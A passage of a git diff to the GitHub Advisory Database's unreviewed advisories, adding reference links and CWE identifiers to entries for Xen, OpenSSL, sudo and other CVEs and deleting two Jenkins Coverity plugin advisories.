@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42321" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json b/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json index c01f98ac50928..d3ab8f93e5a90 100644 --- a/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json +++ b/advisories/unreviewed/2022/11/GHSA-gvg6-g9vq-r6gw/GHSA-gvg6-g9vq-r6gw.json 
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42323" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json b/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json index 842dd9569c527..220675b4adf97 100644 --- a/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json +++ b/advisories/unreviewed/2022/11/GHSA-gw3c-jrpr-59hg/GHSA-gw3c-jrpr-59hg.json 
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42310" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json b/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json index a75c15e81227c..0de5c420c9a6b 100644 --- a/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json +++ b/advisories/unreviewed/2022/11/GHSA-hhhj-6x4j-w995/GHSA-hhhj-6x4j-w995.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1040" 
diff --git a/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json b/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json index ceb20c6d883ce..99f6e97886f7b 100644 --- a/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json +++ b/advisories/unreviewed/2022/11/GHSA-jxpc-fxw3-65cc/GHSA-jxpc-fxw3-65cc.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42319" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json b/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json index 194eef91aedef..ebe40dfeeac12 100644 --- a/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json +++ b/advisories/unreviewed/2022/11/GHSA-p263-3p34-m82m/GHSA-p263-3p34-m82m.json 
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42320" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json b/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json index e0fa58c348d20..6b6dde1dba290 100644 --- a/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json +++ b/advisories/unreviewed/2022/11/GHSA-phxq-3m6p-p9q4/GHSA-phxq-3m6p-p9q4.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-284", "CWE-434" ], diff --git a/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json b/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json index 029dd5bc70be3..159a13525ffa1 100644 --- a/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json +++ b/advisories/unreviewed/2022/11/GHSA-qghj-pfv2-q8gw/GHSA-qghj-pfv2-q8gw.json 
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42309" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json b/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json index ea4580d9efcc3..249023a04848a 100644 --- a/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json +++ b/advisories/unreviewed/2022/11/GHSA-rgfj-62rr-5vf5/GHSA-rgfj-62rr-5vf5.json 
@@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42327" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-412.txt" diff --git a/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json b/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json index 33d08742bad80..0ee1696c03df1 100644 --- a/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json +++ b/advisories/unreviewed/2022/11/GHSA-x7vp-fr4m-26vq/GHSA-x7vp-fr4m-26vq.json 
@@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42325" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTMITQBGC23MSDHUCAPCVGLMVXIBXQTQ/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLI2NPNEH7CNJO3VZGQNOI4M4EWLNKPZ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json b/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json index 5313bac8aaf0b..7a91a1f332466 100644 --- a/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json +++ b/advisories/unreviewed/2022/12/GHSA-7hpg-5cp7-xr78/GHSA-7hpg-5cp7-xr78.json @@ -32,6 +32,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json b/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json index b22d314a4aff4..594b2abd51c3e 100644 --- a/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json +++ b/advisories/unreviewed/2022/12/GHSA-jmmv-7567-qw22/GHSA-jmmv-7567-qw22.json 
@@ -32,6 +32,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "CRITICAL", diff --git a/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json b/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json index 31d6fc4bb376c..b9f1b1ddf8c79 100644 --- a/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json +++ b/advisories/unreviewed/2022/12/GHSA-wfg3-85mh-2rw9/GHSA-wfg3-85mh-2rw9.json @@ -36,6 +36,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-707", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json b/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json index 3e1923d59d745..e669174a12376 100644 --- a/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json +++ b/advisories/unreviewed/2023/01/GHSA-5j3v-r3rh-6vh7/GHSA-5j3v-r3rh-6vh7.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40201" }, + { + "type": "WEB", + "url": "https://www.bentley.com/advisories/be-2023-0003/" + }, { "type": "WEB", "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01" diff --git a/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json b/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json index e524ebf0bc308..cb97a827f5ede 100644 --- a/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json +++ b/advisories/unreviewed/2023/01/GHSA-jvpr-73pr-x7v5/GHSA-jvpr-73pr-x7v5.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42330" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-425.txt" 
diff --git a/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json b/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json index 171a5b7e5d609..cd2869b50a76e 100644 --- a/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json +++ b/advisories/unreviewed/2023/01/GHSA-mqw8-q64p-6837/GHSA-mqw8-q64p-6837.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41613" }, + { + "type": "WEB", + "url": "https://www.bentley.com/advisories/be-2023-0003/" + }, { "type": "WEB", "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01" diff --git a/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json b/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json index 12b12bfc99813..43a095d6cc473 100644 --- a/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json +++ b/advisories/unreviewed/2023/02/GHSA-5p6c-7q82-x6c9/GHSA-5p6c-7q82-x6c9.json @@ -36,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json b/advisories/unreviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json deleted file mode 100644 index 2c145d5c7fc55..0000000000000 --- a/advisories/unreviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c3v2-5388-v8pw", - "modified": "2023-02-23T06:30:19Z", - "published": "2023-02-15T21:30:30Z", - "aliases": [ - "CVE-2023-23848" - ], - "details": "Missing permission checks in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23848" - }, - { - "type": "WEB", - "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-02-15T19:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json b/advisories/unreviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json deleted file mode 100644 index 84ad99638683f..0000000000000 --- a/advisories/unreviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-px6v-6jhf-j46r", - "modified": "2023-02-23T06:30:19Z", - "published": "2023-02-15T21:30:30Z", - "aliases": [ - "CVE-2023-23847" - ], - "details": "A cross-site request forgery (CSRF) vulnerability in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23847" - }, - { - "type": "WEB", - "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-02-15T19:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json b/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json index 53ef55f3757ba..2cfc95a3eda22 100644 --- a/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json +++ b/advisories/unreviewed/2023/02/GHSA-wrh4-6832-wg62/GHSA-wrh4-6832-wg62.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html" } ], "database_specific": { 
diff --git a/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json b/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json index 877b36c1f65ca..1b49721f3be10 100644 --- a/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json +++ b/advisories/unreviewed/2023/03/GHSA-77f3-6546-6rj7/GHSA-77f3-6546-6rj7.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" diff --git a/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json b/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json index 3d53aba5ed77c..e347b113f1aed 100644 --- a/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json +++ b/advisories/unreviewed/2023/03/GHSA-f5x9-rprw-5rc4/GHSA-f5x9-rprw-5rc4.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json b/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json index 61ba98db9862b..5b8985785a0a5 100644 --- a/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json +++ b/advisories/unreviewed/2023/03/GHSA-jc55-2gxv-h2fp/GHSA-jc55-2gxv-h2fp.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_13" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202309-12" 
diff --git a/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json b/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json index d79976dddd260..ea2f333279f85 100644 --- a/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json +++ b/advisories/unreviewed/2023/03/GHSA-jg93-x3r7-r8pf/GHSA-jg93-x3r7-r8pf.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json b/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json index 1fbd95508c09b..380ad5ceda30a 100644 --- a/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json +++ b/advisories/unreviewed/2023/03/GHSA-pr34-r4f9-f5c6/GHSA-pr34-r4f9-f5c6.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://github.com/sudo-project/sudo/releases/tag/SUDO_1_9_13" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202309-12" diff --git a/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json b/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json index 3ba08b94585b3..2b6ad5a9b29ae 100644 --- a/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json +++ b/advisories/unreviewed/2023/03/GHSA-pxvj-4wx4-gv6w/GHSA-pxvj-4wx4-gv6w.json 
@@ -37,6 +37,14 @@ "type": "WEB", "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" @@ -48,6 +56,10 @@ { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230328.txt" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/28/4" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json b/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json index 109275a236285..eaa3d16c223e4 100644 --- a/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json +++ b/advisories/unreviewed/2023/03/GHSA-v57p-c5gg-pq5v/GHSA-v57p-c5gg-pq5v.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APBMS2Q6746AXAFAITNJMGBNFGNMVLWR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5378" diff --git a/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json b/advisories/unreviewed/2023/03/GHSA-vgj2-gwrp-65hq/GHSA-vgj2-gwrp-65hq.json index b8bfb8b5e74f2..68f4c144dd323 100644 